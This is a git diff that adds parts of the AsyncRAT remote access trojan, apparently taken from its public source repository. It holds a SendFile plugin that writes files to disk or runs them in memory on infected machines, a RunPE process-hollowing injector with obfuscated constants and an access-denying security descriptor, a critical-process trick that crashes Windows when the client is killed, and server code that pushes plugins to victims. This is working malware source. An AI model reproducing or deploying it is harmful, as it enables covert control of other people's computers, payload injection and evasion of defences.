+ len = BitConverter.ToUInt16(rawBytes, 0);
+ }
+ else if (strFlag == 0xDB)
+ {
+ rawBytes = new byte[4];
+ ms.Read(rawBytes, 0, 4);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToInt32(rawBytes, 0);
+ }
+ rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/WriteTools.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/WriteTools.cs
new file mode 100644
index 0000000..3de69fa
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/WriteTools.cs
@@ -0,0 +1,199 @@
+using System;
+using System.IO;
+
+namespace Plugin.MessagePack
+{
+ class WriteTools
+ {
+ public static void WriteNull(Stream ms)
+ {
+ ms.WriteByte(0xC0);
+ }
+
+ public static void WriteString(Stream ms, String strVal)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = BytesTools.GetUtf8Bytes(strVal);
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 31)
+ {
+ b = (byte)(0xA0 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 255)
+ {
+ b = 0xD9;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDA;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDB;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+ public static void WriteBinary(Stream ms, byte[] rawBytes)
+ {
+
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 255)
+ {
+ b = 0xC4;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xC5;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xC6;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+
+ public static void WriteFloat(Stream ms, Double fVal)
+ {
+ ms.WriteByte(0xCB);
+ ms.Write(BytesTools.SwapDouble(fVal), 0, 8);
+ }
+
+ public static void WriteSingle(Stream ms, Single fVal)
+ {
+ ms.WriteByte(0xCA);
+ ms.Write(BytesTools.SwapBytes(BitConverter.GetBytes(fVal)), 0, 4);
+ }
+
+ public static void WriteBoolean(Stream ms, Boolean bVal)
+ {
+ if (bVal)
+ {
+ ms.WriteByte(0xC3);
+ }
+ else
+ {
+ ms.WriteByte(0xC2);
+ }
+ }
+
+
+ public static void WriteUInt64(Stream ms, UInt64 iVal)
+ {
+ ms.WriteByte(0xCF);
+ byte[] dataBytes = BitConverter.GetBytes(iVal);
+ ms.Write(BytesTools.SwapBytes(dataBytes), 0, 8);
+ }
+
+ public static void WriteInteger(Stream ms, Int64 iVal)
+ {
+ if (iVal >= 0)
+ { // 正数
+ if (iVal <= 127)
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= 255)
+ { //UInt8
+ ms.WriteByte(0xCC);
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= (UInt32)0xFFFF)
+ { //UInt16
+ ms.WriteByte(0xCD);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= (UInt32)0xFFFFFFFF)
+ { //UInt32
+ ms.WriteByte(0xCE);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else
+ { //Int64
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ }
+ else
+ { // <0
+ if (iVal <= Int32.MinValue) //-2147483648 // 64 bit
+ {
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ else if (iVal <= Int16.MinValue) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD2);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else if (iVal <= -128) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD1);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= -32)
+ {
+ ms.WriteByte(0xD0);
+ ms.WriteByte((byte)iVal);
+ }
+ else
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ } // end <0
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Methods.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Methods.cs
new file mode 100644
index 0000000..237f2b4
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Methods.cs
@@ -0,0 +1,66 @@
+using Microsoft.Win32;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Runtime.InteropServices;
+using System.Security.Principal;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public static class Methods
+ {
+ public static void ClientExit()
+ {
+ try
+ {
+ if (Convert.ToBoolean(Plugin.BDOS) && IsAdmin())
+ ProcessCriticalExit();
+ CloseMutex();
+ Connection.SslClient?.Close();
+ Connection.TcpClient?.Close();
+ }
+ catch { }
+ }
+
+ public static bool IsAdmin()
+ {
+ return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
+ }
+
+ public static void CloseMutex()
+ {
+ if (Plugin.AppMutex != null)
+ {
+ Plugin.AppMutex.Close();
+ Plugin.AppMutex = null;
+ }
+ }
+
+ public static void SystemEvents_SessionEnding(object sender, SessionEndingEventArgs e)
+ {
+ if (Convert.ToBoolean(Plugin.BDOS) && Methods.IsAdmin())
+ ProcessCriticalExit();
+ }
+
+ public static void ProcessCriticalExit()
+ {
+ try
+ {
+ RtlSetProcessIsCritical(0, 0, 0);
+ }
+ catch
+ {
+ while (true)
+ {
+ Thread.Sleep(100000); //prevents a BSOD on exit failure
+ }
+ }
+ }
+
+ [DllImport("ntdll.dll", SetLastError = true)]
+ private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Packet.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Packet.cs
new file mode 100644
index 0000000..86bc9a0
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Packet.cs
@@ -0,0 +1,54 @@
+using Plugin.Handler;
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Management;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Threading;
+using System.Windows.Forms;
+
+namespace Plugin
+{
+ public static class Packet
+ {
+ public static void Read(object data)
+ {
+ try
+ {
+ MsgPack unpack_msgpack = new MsgPack();
+ unpack_msgpack.DecodeFromBytes((byte[])data);
+ switch (unpack_msgpack.ForcePathObject("Packet").AsString)
+ {
+ case "sendFile":
+ {
+ new HandleSendTo().SendToDisk(unpack_msgpack);
+ break;
+ }
+
+ case "sendMemory":
+ {
+ new HandleSendTo().SendToMemory(unpack_msgpack);
+ break;
+ }
+ }
+ }
+ catch (Exception ex)
+ {
+ Error(ex.Message);
+ }
+ }
+
+ public static void Error(string ex)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Error";
+ msgpack.ForcePathObject("Error").AsString = ex;
+ Connection.Send(msgpack.Encode2Bytes());
+ }
+ }
+
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Plugin.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Plugin.cs
new file mode 100644
index 0000000..5bc9da7
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Plugin.cs
@@ -0,0 +1,45 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public class Plugin
+ {
+ public static Socket Socket;
+ public static Mutex AppMutex;
+ public static string Mutex;
+ public static string BDOS;
+ public static string Install;
+ public static string InstallFile;
+
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ {
+ Debug.WriteLine("Plugin Invoked");
+ AppMutex = mutex;
+ Mutex = mtx;
+ BDOS = bdos;
+ Install = install;
+ InstallFile = installFile;
+ Socket = socket;
+ Connection.ServerCertificate = certificate;
+ Connection.Hwid = hwid;
+ new Thread(() =>
+ {
+ Connection.InitializeClient(msgPack);
+ }).Start();
+
+ while (Connection.IsConnected)
+ {
+ Thread.Sleep(1000);
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Properties/AssemblyInfo.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Properties/AssemblyInfo.cs
new file mode 100644
index 0000000..99f3f28
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("")]
+[assembly: AssemblyCopyright("")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+//[assembly: Guid("8de42da3-be99-4e7e-a3d2-3f65e7c1abce")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs
new file mode 100644
index 0000000..b6c220c
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs
@@ -0,0 +1,206 @@
+using System;
+using System.ComponentModel;
+using System.Diagnostics;
+using System.Runtime.InteropServices;
+using System.Security;
+using System.Security.AccessControl;
+using System.Security.Principal;
+
+namespace Plugin
+{
+ public static class RunPE
+ {
+ //github.com/Artiist/RunPE-Process-Protection/blob/master/RunPE.cs
+
+ [DllImport("kernel32.dll", EntryPoint = "CreateProcess", CharSet = CharSet.Unicode), SuppressUnmanagedCodeSecurity]
+ private static extern bool CreateProcess(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref ProcessInformation processInformation);
+ [DllImport("kernel32.dll", EntryPoint = "GetThreadContext"), SuppressUnmanagedCodeSecurity]
+ private static extern bool GetThreadContext(IntPtr thread, int[] context);
+ [DllImport("kernel32.dll", EntryPoint = "Wow64GetThreadContext"), SuppressUnmanagedCodeSecurity]
+ private static extern bool Wow64GetThreadContext(IntPtr thread, int[] context);
+ [DllImport("kernel32.dll", EntryPoint = "SetThreadContext"), SuppressUnmanagedCodeSecurity]
+ private static extern bool SetThreadContext(IntPtr thread, int[] context);
+ [DllImport("kernel32.dll", EntryPoint = "Wow64SetThreadContext"), SuppressUnmanagedCodeSecurity]
+ private static extern bool Wow64SetThreadContext(IntPtr thread, int[] context);
+ [DllImport("kernel32.dll", EntryPoint = "ReadProcessMemory"), SuppressUnmanagedCodeSecurity]
+ private static extern bool ReadProcessMemory(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);
+ [DllImport("kernel32.dll", EntryPoint = "WriteProcessMemory"), SuppressUnmanagedCodeSecurity]
+ private static extern bool WriteProcessMemory(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
+ [DllImport("ntdll.dll", EntryPoint = "NtUnmapViewOfSection"), SuppressUnmanagedCodeSecurity]
+ private static extern int NtUnmapViewOfSection(IntPtr process, int baseAddress);
+ [DllImport("kernel32.dll", EntryPoint = "VirtualAllocEx"), SuppressUnmanagedCodeSecurity]
+ private static extern int VirtualAllocEx(IntPtr handle, int address, int length, int type, int protect);
+ [DllImport("kernel32.dll", EntryPoint = "ResumeThread"), SuppressUnmanagedCodeSecurity]
+ private static extern int ResumeThread(IntPtr handle);
+ [StructLayout(LayoutKind.Sequential, Pack = 2 - 1)]
+ private struct ProcessInformation
+ {
+ public readonly IntPtr ProcessHandle;
+ public readonly IntPtr ThreadHandle;
+ public readonly uint ProcessId;
+ private readonly uint ThreadId;
+ }
+ [StructLayout(LayoutKind.Sequential, Pack = 3 - 2)]
+ private struct StartupInformation
+ {
+ public uint Size;
+ private readonly string Reserved1;
+ private readonly string Desktop;
+ private readonly string Title;
+ [MarshalAs(UnmanagedType.ByValArray, SizeConst = 18 + 18)] private readonly byte[] Misc;
+ private readonly IntPtr Reserved2;
+ private readonly IntPtr StdInput;
+ private readonly IntPtr StdOutput;
+ private readonly IntPtr StdError;
+ }
+
+ public static bool Run(string path, byte[] data, bool protect)
+ {
+ for (int I = 1; I <= 5; I++)
+ if (HandleRun(path, data, protect)) return true;
+ return false;
+ }
+
+ private static bool HandleRun(string path, byte[] data, bool protect)
+ {
+ int readWrite = 0;
+ string quotedPath = "";
+ StartupInformation si = new StartupInformation();
+ ProcessInformation pi = new ProcessInformation();
+ si.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation)));
+ try
+ {
+ if (!CreateProcess(path, quotedPath, IntPtr.Zero, IntPtr.Zero, false, 2 + 2, IntPtr.Zero, null, ref si, ref pi)) throw new Exception();
+ int fileAddress = BitConverter.ToInt32(data, 120 / 2);
+ int imageBase = BitConverter.ToInt32(data, fileAddress + 26 + 26);
+ int[] context = new int[179];
+ context[0] = 32769 + 32769;
+ if (IntPtr.Size == 8 / 2)
+ { if (!GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
+ else
+ { if (!Wow64GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
+ int ebx = context[41];
+ int baseAddress = 1 - 1;
+ if (!ReadProcessMemory(pi.ProcessHandle, ebx + 4 + 4, ref baseAddress, 2 + 2, ref readWrite)) throw new Exception();
+ if (imageBase == baseAddress)
+ if (NtUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 1 - 1) throw new Exception();
+ int sizeOfImage = BitConverter.ToInt32(data, fileAddress + 160 / 2);
+ int sizeOfHeaders = BitConverter.ToInt32(data, fileAddress + 42 + 42);
+ bool allowOverride = false;
+ int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 6144 + 6144, 32 + 32);
+
+ if (newImageBase == 0) throw new Exception();
+ if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, data, sizeOfHeaders, ref readWrite)) throw new Exception();
+ int sectionOffset = fileAddress + 124 * 2;
+ short numberOfSections = BitConverter.ToInt16(data, fileAddress + 3 + 3);
+ for (int I = 1 - 1; I < numberOfSections; I++)
+ {
+ int virtualAddress = BitConverter.ToInt32(data, sectionOffset + 6 + 6);
+ int sizeOfRawData = BitConverter.ToInt32(data, sectionOffset + 8 + 8);
+ int pointerToRawData = BitConverter.ToInt32(data, sectionOffset + 40 / 2);
+ if (sizeOfRawData != 1 - 1)
+ {
+ byte[] sectionData = new byte[sizeOfRawData];
+ Buffer.BlockCopy(data, pointerToRawData, sectionData, 2 - 2, sectionData.Length);
+ if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) throw new Exception();
+ }
+ sectionOffset += 120 / 3;
+ }
+ byte[] pointerData = BitConverter.GetBytes(newImageBase);
+ if (!WriteProcessMemory(pi.ProcessHandle, ebx + 16 / 2, pointerData, 2 * 2, ref readWrite)) throw new Exception();
+ int addressOfEntryPoint = BitConverter.ToInt32(data, fileAddress + 80 / 2);
+ if (allowOverride) newImageBase = imageBase;
+ context[22 + 22] = newImageBase + addressOfEntryPoint;
+
+ if (IntPtr.Size == 2 + 2)
+ {
+ if (!SetThreadContext(pi.ThreadHandle, context)) throw new Exception();
+ }
+ else
+ {
+ if (!Wow64SetThreadContext(pi.ThreadHandle, context)) throw new Exception();
+ }
+ if (ResumeThread(pi.ThreadHandle) == -1) throw new Exception();
+ if (protect) Protect(pi.ProcessHandle);
+ }
+ catch
+ {
+ Process.GetProcessById(Convert.ToInt32(pi.ProcessId)).Kill();
+ return false;
+ }
+ return true;
+ }
+
+ [DllImport("advapi32.dll", SetLastError = true)]
+ private static extern bool GetKernelObjectSecurity(IntPtr Handle, int securityInformation, [Out] byte[] pSecurityDescriptor, uint nLength, ref uint lpnLengthNeeded);
+
+ [DllImport("advapi32.dll", SetLastError = true)]
+ private static extern bool SetKernelObjectSecurity(IntPtr Handle, int securityInformation, [In] byte[] pSecurityDescriptor);
+
+ private static void SetProcessSecurityDescriptor(IntPtr processHandle, RawSecurityDescriptor rawSecurityDescriptor)
+ {
+ byte[] array = new byte[checked(rawSecurityDescriptor.BinaryLength - 1 + 1 - 1 + 1)];
+ rawSecurityDescriptor.GetBinaryForm(array, 0);
+ bool flag = !SetKernelObjectSecurity(processHandle, 4, array);
+ if (flag)
+ {
+ throw new Win32Exception();
+ }
+ }
+
+ private static T InlineAssignHelper(ref T target, T value)
+ {
+ target = value;
+ return value;
+ }
+
+ private static RawSecurityDescriptor GetProcessSecurityDescriptor(IntPtr processHandle)
+ {
+ byte[] array = new byte[0];
+ uint bufferSize = new uint();
+ GetKernelObjectSecurity(processHandle, 4, array, 0u, ref bufferSize);
+ if (bufferSize < 0 || bufferSize > short.MaxValue)
+ {
+ throw new Win32Exception();
+ }
+
+ bool cdt = !GetKernelObjectSecurity(processHandle, 4, InlineAssignHelper(ref array, new byte[checked((int)(unchecked((ulong)bufferSize) - 1UL) + 1 - 1 + 1)]), bufferSize, ref bufferSize);
+ if (cdt)
+ {
+ throw new Win32Exception();
+ }
+ return new RawSecurityDescriptor(array, 0);
+ }
+
+ private static void Protect(IntPtr processHandle)
+ {
+ RawSecurityDescriptor rawSecurityDescriptor = GetProcessSecurityDescriptor(processHandle);
+ rawSecurityDescriptor.DiscretionaryAcl.InsertAce(0, new CommonAce(AceFlags.None, AceQualifier.AccessDenied, 987135, new SecurityIdentifier(WellKnownSidType.WorldSid, null), false, null));
+ SetProcessSecurityDescriptor(processHandle, rawSecurityDescriptor);
+ }
+
+ private enum ProcessAccessRights
+ {
+ DELETE = 65536,
+ ITE_OWNER = 524288,
+ PROCESS_ALL_ACCESS = 987135,
+ PROCESS_CREATE_PROCESS = 128,
+ PROCESS_CREATE_THREAD = 2,
+ PROCESS_DUP_HANDLE = 64,
+ PROCESS_QUERY_INFORMATION = 1024,
+ PROCESS_QUERY_LIMITED_INFORMATION = 4096,
+ PROCESS_SET_INFORMATION = 512,
+ PROCESS_SET_QUOTA = 256,
+ PROCESS_SUSPEND_RESUME = 2048,
+ PROCESS_TERMINATE = 1,
+ PROCESS_VM_OPERATION = 8,
+ PROCESS_VM_READ = 16,
+ PROCESS_VM_WRITE = 32,
+ READ_CONTROL = 131072,
+ STANDARD_RIGHTS_REQUIRED = 983040,
+ SYNCHRONIZE = 256,
+ WRITE_DAC = 262144
+ }
+ }
+
+}
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj b/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj
new file mode 100644
index 0000000..72b2382
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj
@@ -0,0 +1,59 @@
+
+
+
+
+ Debug
+ AnyCPU
+ {8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE}
+ Library
+ Properties
+ Plugin
+ SendFile
+ v4.0
+ 512
+ true
+
+
+ true
+ full
+ false
+ ..\..\..\Binaries\Debug\Plugins\
+ DEBUG;TRACE
+ prompt
+ 4
+
+
+ none
+ true
+ ..\..\..\Binaries\Release\Plugins\
+ TRACE
+ prompt
+ 4
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Server/Algorithm/GetHash.cs b/AsyncRAT-C#/Server/Algorithm/GetHash.cs
new file mode 100644
index 0000000..fa2a3a0
--- /dev/null
+++ b/AsyncRAT-C#/Server/Algorithm/GetHash.cs
@@ -0,0 +1,23 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Security.Cryptography;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Server.Algorithm
+{
+ public static class GetHash
+ {
+ public static string GetChecksum(string file)
+ {
+ using (FileStream stream = File.OpenRead(file))
+ {
+ SHA256Managed sha = new SHA256Managed();
+ byte[] checksum = sha.ComputeHash(stream);
+ return BitConverter.ToString(checksum).Replace("-", String.Empty);
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Server/Connection/Clients.cs b/AsyncRAT-C#/Server/Connection/Clients.cs
index 90caba4..7b90ba2 100644
--- a/AsyncRAT-C#/Server/Connection/Clients.cs
+++ b/AsyncRAT-C#/Server/Connection/Clients.cs
@@ -3,17 +3,15 @@ using System.IO;
using System.Net.Sockets;
using System.Windows.Forms;
using Server.Handle_Packet;
-using System.Security.Cryptography;
using System.Drawing;
using System.Diagnostics;
using System.Threading;
using Server.MessagePack;
-using System.Text;
using System.Net.Security;
using System.Security.Authentication;
-using System.Threading.Tasks;
using Server.Algorithm;
-using Server.Helper;
+using Microsoft.VisualBasic;
+using System.Collections.Generic;
namespace Server.Connection
{
@@ -31,7 +29,6 @@ namespace Server.Connection
public object SendSync { get; } = new object();
public long BytesRecevied { get; set; }
-
public Clients(Socket socket)
{
TcpClient = socket;
@@ -92,7 +89,7 @@ namespace Server.Connection
BytesRecevied += Recevied;
if (ClientMS.Length == ClientBuffersize)
{
- ThreadPool.QueueUserWorkItem(Packet.Read, new object[] { ClientMS.ToArray(), this });
+ ThreadPool.QueueUserWorkItem(new Packet().Read, new object[] { ClientMS.ToArray(), this });
ClientBuffer = new byte[4];
ClientMS.Dispose();
ClientMS = new MemoryStream();
@@ -119,36 +116,27 @@ namespace Server.Connection
{
if (LV != null)
{
- if (Program.form1.listView1.InvokeRequired)
- Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
+ Program.form1.BeginInvoke((MethodInvoker)(() =>
+ {
+ try
{
- try
+
+ lock (Settings.LockListviewClients)
+ LV.Remove();
+
+ if (LV2 != null)
{
-
- lock (Settings.LockListviewClients)
- LV.Remove();
-
- if (LV2 != null)
- {
- lock (Settings.LockListviewThumb)
- LV2.Remove();
- }
-
+ lock (Settings.LockListviewThumb)
+ LV2.Remove();
}
- catch { }
- }));
+ }
+ catch { }
+ }));
+ new HandleLogs().Addmsg($"Client {TcpClient.RemoteEndPoint.ToString().Split(':')[0]} disconnected", Color.Red);
}
try
{
- TcpClient.Shutdown(SocketShutdown.Both);
- }
- catch { }
-
- try
- {
- SslClient?.Close();
- TcpClient?.Close();
SslClient?.Dispose();
TcpClient?.Dispose();
ClientMS?.Dispose();
@@ -197,6 +185,7 @@ namespace Server.Connection
{
SslClient.Write(buffer, 0, buffer.Length);
SslClient.Flush();
+ Settings.Sent += buffer.Length;
}
Debug.WriteLine("/// Server Sent " + buffer.Length.ToString() + " Bytes ///");
}
@@ -208,5 +197,70 @@ namespace Server.Connection
}
}
+ public void CheckPlugin() // send all plugins md5 hash to client
+ {
+ try
+ {
+ List plugins = new List();
+ foreach (var plugin in Settings.Plugins)
+ {
+ plugins.Add(plugin.Key);
+ }
+ if (plugins.Count > 0)
+ {
+ MsgPack msgPack = new MsgPack();
+ msgPack.ForcePathObject("Packet").SetAsString("checkPlugin");
+ msgPack.ForcePathObject("Hash").SetAsString(string.Join(",", plugins));
+ Send(msgPack.Encode2Bytes());
+ }
+ }
+ catch (Exception ex)
+ {
+ new HandleLogs().Addmsg($"Client {TcpClient.RemoteEndPoint.ToString().Split(':')[0]} {ex.Message}", Color.Red);
+ }
+ }
+
+ public void SendPlugin(string hash) // client is missing some plguins, sending them
+ {
+ try
+ {
+ foreach (var plugin in Settings.Plugins)
+ {
+ if (hash == plugin.Key)
+ {
+ MsgPack msgPack = new MsgPack();
+ msgPack.ForcePathObject("Packet").SetAsString("savePlugin");
+ msgPack.ForcePathObject("Dll").SetAsString(plugin.Value);
+ msgPack.ForcePathObject("Hash").SetAsString(plugin.Key);
+ Send(msgPack.Encode2Bytes());
+ break;
+ }
+ }
+ }
+ catch (Exception ex)
+ {
+ new HandleLogs().Addmsg($"Client {TcpClient.RemoteEndPoint.ToString().Split(':')[0]} {ex.Message}", Color.Red);
+ }
+ }
+
+ public void ReSendPAlllugins() // because we used ReSendPlugins ToolStripMenuItem
+ {
+ try
+ {
+ foreach (var plugin in Settings.Plugins)
+ {
+ MsgPack msgPack = new MsgPack();
+ msgPack.ForcePathObject("Packet").SetAsString("savePlugin");
+ msgPack.ForcePathObject("Dll").SetAsString(plugin.Value);
+ msgPack.ForcePathObject("Hash").SetAsString(plugin.Key);
+ Send(msgPack.Encode2Bytes());
+ }
+ }
+ catch (Exception ex)
+ {
+ new HandleLogs().Addmsg($"Client {TcpClient.RemoteEndPoint.ToString().Split(':')[0]} {ex.Message}", Color.Red);
+ }
+ }
+
}
}
diff --git a/AsyncRAT-C#/Server/Forms/Form1.Designer.cs b/AsyncRAT-C#/Server/Forms/Form1.Designer.cs
index 3103b23..4320008 100644
--- a/AsyncRAT-C#/Server/Forms/Form1.Designer.cs
+++ b/AsyncRAT-C#/Server/Forms/Form1.Designer.cs
@@ -70,7 +70,6 @@
this.getAdminPrivilegesToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.blankScreenToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.disableWindowsDefenderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
- this.disableNetStatToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.systemToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.clientToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.closeToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
@@ -119,7 +118,6 @@
this.performanceCounter2 = new System.Diagnostics.PerformanceCounter();
this.notifyIcon1 = new System.Windows.Forms.NotifyIcon(this.components);
this.TimerTask = new System.Windows.Forms.Timer(this.components);
- this.GetThumbnails = new System.Windows.Forms.Timer(this.components);
this.contextMenuClient.SuspendLayout();
this.statusStrip1.SuspendLayout();
this.tabControl1.SuspendLayout();
@@ -151,6 +149,7 @@
this.listView1.Dock = System.Windows.Forms.DockStyle.Fill;
this.listView1.FullRowSelect = true;
this.listView1.GridLines = true;
+ this.listView1.HideSelection = false;
this.listView1.Location = new System.Drawing.Point(3, 3);
this.listView1.Name = "listView1";
this.listView1.ShowGroups = false;
@@ -210,7 +209,6 @@
//
// contextMenuClient
//
- this.contextMenuClient.ImageScalingSize = new System.Drawing.Size(24, 24);
this.contextMenuClient.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.aBOUTToolStripMenuItem,
this.toolStripSeparator2,
@@ -222,20 +220,20 @@
this.toolStripSeparator1,
this.bUILDERToolStripMenuItem});
